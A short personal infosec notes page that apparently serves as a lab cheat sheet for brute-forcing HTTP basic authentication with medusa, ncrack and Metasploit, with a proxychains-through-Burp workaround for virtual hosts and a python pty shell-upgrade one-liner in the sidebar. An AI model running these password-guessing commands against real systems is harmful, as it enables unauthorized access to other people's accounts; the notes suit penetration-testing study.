akde/infosec

Information security is ultimately about managing risk

Breaking .htaccess

,
, , , , , , , ,

With Medusa

Does­n’t seem to work with vir­tu­al hosts!

medusa -h 10.11.1.49 -u bethany -P Dog_Names_normalized.txt -M http -m DIR:/~Public -T 2

With ncrack

Does­n’t seem to work with vir­tu­al hosts!

ncrack -vv --user bethany -P Dog_Names_normalized.txt http://10.11.1.49:9505 -m http:path=/~Public/

With metasploit

Use mod­ule auxiliary/scanner/http/http_login

Virtual hosts

If Host head­ers are not supported:

  1. Start Burp proxy
  2. Con­fig­ure prox­y­chains to use Burp proxy.
  3. Prepend prox­y­chains before the com­mand and the requests are going through Burp. Example: 
    • proxychains medusa -s -h docker.registry.htb -u registry -P /usr/share/wordlists/rockyou.txt -M http -m DIR:v2/_catalog -T 20
  4. In Burp, con­fig­ure head­er modifications.

More

  • https://www.hackingarticles.in/multiple-ways-to-exploiting-http-authentication/

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';